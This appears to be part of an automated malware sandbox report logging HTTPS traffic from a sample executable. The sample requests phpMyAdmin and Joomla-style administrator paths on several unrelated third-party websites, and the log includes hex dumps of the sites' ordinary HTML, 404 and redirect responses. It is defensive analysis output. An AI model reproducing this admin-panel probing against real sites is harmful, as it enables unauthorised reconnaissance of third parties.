                                                                                                                                                                                                    Data Ascii: trigger: function ( event_type, event_data, el ) {var event;try {event = new CustomEvent( event_type, { detail: event_data } );} catch ( e ) {event = document.createEvent( 'CustomEvent' );event.initCustomEvent
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 43 6f 6e 63 6f 72 64 20 4c 65 61 72 6e 69 6e 67 20 41 63 61 64 65 6d 79 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ollow' />... This site is optimized with the Yoast SEO plugin v21.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Concord Learning Academy</title><meta property="og:locale" content="en_US" /><meta property="og:title" cont
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 2f 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 61 63 65 62 6f 6f 6b 2d 64 6f 6d 61 69 6e 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 70 77 31 76 6b 77 6f 36 7a 7a 6d 68 32 69 76 30 6f 6d 6e 6c 7a 35 61 61 64 74 71 6b 34 39 22 20 2f 3e 0d 0a 3c 21 2d 2d 20 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 43 6f 64 65 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 66 2c 62 2c 65 2c 76 2c 6e 2c 74 2c 73 29 0d 0a 7b 69 66 28 66 2e 66 62 71 29 72 65 74 75 72 6e 3b 6e 3d 66 2e 66 62 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 63 61 6c 6c 4d 65 74 68 6f 64 3f 6e 2e 63 61 6c 6c 4d 65
                                                                                                                                                                                                    Data Ascii: as="font" type="font/woff2" crossorigin/><meta name="facebook-domain-verification" content="pw1vkwo6zzmh2iv0omnlz5aadtqk49" />... Facebook Pixel Code --><script>!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?n.callMe
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0d 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0d 0a 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0d 0a 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 6d 2e 6a 73 3f 69 64
                                                                                                                                                                                                    Data Ascii: cript>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 43 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 34 30 34 22 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 23 61 31 31 79 2d 73 6b 69 70 2d 6c 69 6e 6b 2d 63 6f 6e 74 65 6e 74 22 20 63 6c 61 73 73 3d 22 61 31 31 79 2d 73 6b 69 70 2d 6c 69 6e 6b 20 61 31 31 79 2d 76 69 73 75 61 6c 2d 68 69 64 65 22 3e 53 6b 69 70 20 74 6f 20 6d 61 69 6e 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 0a 3c 64 69 76 20 63 6c
                                                                                                                                                                                                    Data Ascii: cation-TileImage" content=""><meta name="msapplication-TileColor" content=""><meta name="theme-color" content=""></head><body class="error404"><a href="#a11y-skip-link-content" class="a11y-skip-link a11y-visual-hide">Skip to main content</a><div cl
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 09 09 09 09 3c 2f 6f 6c 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 3c 2f 6e 61 76 3e 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 63 6f 6e 74 61 69 6e 65 72 20 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 77 69 64 65 20 73 69 74 65 2d 68 65 61 64 65 72 5f 5f 6f 75 74 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 5f 5f 69 6e 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 64 61 74 61 2d 6a 73 3d 22 6c 6f 67 6f 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 69 64 73 72 6b 69 64 73 2e 63 6f 6d 2f 63 6f 6e 63 6f 72 64 22 20 20 72 65 6c 3d 22 68 6f 6d 65 22 3e 43 6f 6e 63 6f 72 64 20 4c 65 61 72 6e 69 6e 67 20 41 63 61 64 65 6d 79 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d
                                                                                                                                                                                                    Data Ascii: </ol></div></nav><div class="l-container l-container--wide site-header__outer"><div class="site-header__inner"><div class="logo" data-js="logo"><a href="https://kidsrkids.com/concord" rel="home">Concord Learning Academy</a><span class=
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 6c 3d 22 53 63 68 6f 6f 6c 20 49 6e 66 6f 22 20 64 61 74 61 2d 65 78 70 61 6e 64 3d 22 32 30 30 22 20 20 20 64 61 74 61 2d 73 69 7a 65 73 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 36 30 70 78 29 20 31 32 36 30 70 78 2c 20 31 30 30 76 77 22 20 64 61 74 61 2d 62 67 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 6b 69 64 73 72 6b 69 64 73 2e 63 6f 6d 2f 63 6f 6e 63 6f 72 64 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 32 2f 32 30 31 38 2f 31 30 2f 53 63 68 6f 6f 6c 5f 41 67 65 5f 54 72 61 6e 73 70 6f 72 74 61 74 69 6f 6e 5f 62 75 73 2d 65 31 35 38 39 38 36 36 37 39 37 38 33 33 2d 36 30 30 78 33 37 35 2e 6a 70 67 20 36 30 30 77 20 33 37 35 68 2c 20 0a 68 74 74 70 73 3a 2f 2f 6b 69 64 73 72 6b 69 64 73 2e 63 6f 6d 2f 63 6f 6e 63
                                                                                                                                                                                                    Data Ascii: l="School Info" data-expand="200" data-sizes="(min-width: 1260px) 1260px, 100vw" data-bgset="https://kidsrkids.com/concord/wp-content/uploads/sites/2/2018/10/School_Age_Transportation_bus-e1589866797833-600x375.jpg 600w 375h, https://kidsrkids.com/conc


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    113192.168.2.45754167.205.16.724436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: capforge.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC512INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 62 69 64 3d 62 65 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://capforge.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: pbid=be0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 64 35 33 62 0d 0a
                                                                                                                                                                                                    Data Ascii: d53b
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC7800INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 69 74 65 6d 73 63 6f 70 65 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e
                                                                                                                                                                                                    Data Ascii: <!doctype html><html dir="ltr" lang="en-US" prefix="og: https://ogp.me/ns#" class="no-js" itemtype="https://schema.org/WebPage" itemscope><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><lin
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC8192INData Raw: 2f 22 7d 2c 22 73 6f 63 69 61 6c 22 3a 7b 22 74 77 69 74 74 65 72 22 3a 22 6f 70 74 69 6d 69 7a 65 70 72 65 73 73 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 6f 70 74 69 6d 69 7a 65 70 72 65 73 73 22 2c 22 67 6f 6f 67 6c 65 70 6c 75 73 22 3a 22 31 31 31 32 37 33 34 34 34 37 33 33 37 38 37 33 34 39 39 37 31 22 7d 2c 22 66 6c 6f 77 70 6c 61 79 65 72 48 54 4d 4c 35 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 70 6c 75 67 69 6e 73 5c 2f 6f 70 74 69 6d 69 7a 65 50 72 65 73 73 50 6c 75 67 69 6e 5c 2f 6c 69 62 5c 2f 6d 6f 64 75 6c 65 73 5c 2f 62 6c 6f 67 5c 2f 76 69 64 65 6f 5c 2f 66 6c 6f 77 70 6c 61 79 65 72 5c 2f 66 6c 6f 77 70 6c 61 79 65 72 2e 73 77 66 22 2c 22 66 6c 6f 77 70 6c 61 79 65
                                                                                                                                                                                                    Data Ascii: /"},"social":{"twitter":"optimizepress","facebook":"optimizepress","googleplus":"111273444733787349971"},"flowplayerHTML5":"https:\/\/capforge.com\/wp-content\/plugins\/optimizePressPlugin\/lib\/modules\/blog\/video\/flowplayer\/flowplayer.swf","flowplaye
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC8192INData Raw: 65 6d 65 6e 74 6f 72 2d 64 65 66 61 75 6c 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 6b 69 74 2d 32 31 31 38 22 3e 3c 64 69 76 20 69 64 3d 22 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 69 74 65 20 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 22 3e 20 3c 61 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 20 73 63 72 6f 6c 6c 2d 69 67 6e 6f 72 65 22 20 68 72 65 66 3d 22 23 6d 61 69 6e 22 3e 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 3c 68 65 61 64 65 72 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 22 20 72 6f 6c 65 3d 22 62 61 6e 6e 65 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57
                                                                                                                                                                                                    Data Ascii: ementor-default elementor-kit-2118"><div id="wrapper" class="site wp-site-blocks"> <a class="skip-link screen-reader-text scroll-ignore" href="#main">Skip to content</a><header id="masthead" class="site-header" role="banner" itemtype="https://schema.org/W
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC8192INData Raw: 65 6e 75 2d 69 74 65 6d 2d 37 31 33 33 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 63 61 74 65 67 6f 72 79 2f 64 65 6e 74 61 6c 2d 70 72 61 63 74 69 63 65 2d 74 69 70 73 2f 22 3e 44 65 6e 74 61 6c 20 50 72 61 63 74 69 63 65 20 54 69 70 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 37 31 33 34 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 74 61 78 6f 6e 6f 6d 79 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 61 74 65 67 6f 72 79 20 6d 65 6e 75 2d 69 74 65 6d 2d 37 31 33 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 63 61 74 65 67 6f 72 79 2f 69 6e 73
                                                                                                                                                                                                    Data Ascii: enu-item-7133"><a href="https://capforge.com/category/dental-practice-tips/">Dental Practice Tips</a></li><li id="menu-item-7134" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7134"><a href="https://capforge.com/category/ins
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC8192INData Raw: 37 2d 30 2e 32 31 39 2d 31 2e 34 30 36 2d 30 2e 35 39 34 6c 2d 35 2e 33 35 39 2d 35 2e 33 34 34 63 2d 31 2e 38 32 38 20 31 2e 32 36 36 2d 34 2e 30 31 36 20 31 2e 39 33 37 2d 36 2e 32 33 34 20 31 2e 39 33 37 2d 36 2e 30 37 38 20 30 2d 31 31 2d 34 2e 39 32 32 2d 31 31 2d 31 31 73 34 2e 39 32 32 2d 31 31 20 31 31 2d 31 31 20 31 31 20 34 2e 39 32 32 20 31 31 20 31 31 63 30 20 32 2e 32 31 39 2d 30 2e 36 37 32 20 34 2e 34 30 36 2d 31 2e 39 33 37 20 36 2e 32 33 34 6c 35 2e 33 35 39 20 35 2e 33 35 39 63 30 2e 33 35 39 20 30 2e 33 35 39 20 30 2e 35 37 38 20 30 2e 38 37 35 20 30 2e 35 37 38 20 31 2e 34 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 20 3c 2f 73 76 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 72 6d 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 73 65
                                                                                                                                                                                                    Data Ascii: 7-0.219-1.406-0.594l-5.359-5.344c-1.828 1.266-4.016 1.937-6.234 1.937-6.078 0-11-4.922-11-11s4.922-11 11-11 11 4.922 11 11c0 2.219-0.672 4.406-1.937 6.234l5.359 5.359c0.359 0.359 0.578 0.875 0.578 1.406z"></path> </svg></span></div></form></div></div></se
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC8192INData Raw: 74 65 2d 68 65 61 64 65 72 2d 69 74 65 6d 2d 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 73 74 72 65 74 63 68 2d 66 61 6c 73 65 22 20 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 6b 61 64 65 6e 63 65 5f 63 75 73 74 6f 6d 69 7a 65 72 5f 6d 6f 62 69 6c 65 5f 6e 61 76 69 67 61 74 69 6f 6e 22 3e 3c 6e 61 76 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 64 72 61 77 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 20 64 72 61 77 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 70 61 72 65 6e 74 2d 74 6f 67 67 6c 65 2d 74 72 75 65 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: te-header-item-mobile-navigation mobile-navigation-layout-stretch-false" data-section="kadence_customizer_mobile_navigation"><nav id="mobile-site-navigation" class="mobile-navigation drawer-navigation drawer-navigation-parent-toggle-true" role="navigation
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC5824INData Raw: 76 65 72 74 6b 69 74 5f 62 72 6f 61 64 63 61 73 74 73 5f 72 65 6e 64 65 72 22 2c 22 64 65 62 75 67 22 3a 22 22 7d 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 76 65 72 74 6b 69 74 2f 72 65 73 6f 75 72 63 65 73 2f 66 72 6f 6e 74 65 6e 64 2f 6a 73 2f 62 72 6f 61 64 63 61 73 74 73 2e 6a 73 3f 76 65 72 3d 32 2e 33 2e 37 22 20 69 64 3d 22 63 6f 6e 76 65 72 74 6b 69 74 2d 62 72 6f 61 64 63 61 73 74 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f
                                                                                                                                                                                                    Data Ascii: vertkit_broadcasts_render","debug":""};</script> <script src="https://capforge.com/wp-content/plugins/convertkit/resources/frontend/js/broadcasts.js?ver=2.3.7" id="convertkit-broadcasts-js"></script> <script src="https://capforge.com/wp-content/plugins/co
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC3INData Raw: 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: ml>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    114192.168.2.45680518.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC209INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    115192.168.2.45733034.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC246OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.linkan-group.com/administrator
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1080INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 33 2e 31 34 34 31 30 33 32 38 30 37 32 33 33 37 38 32 31 38 30 34 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978373.14410328072337821804Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.1
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC172INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user
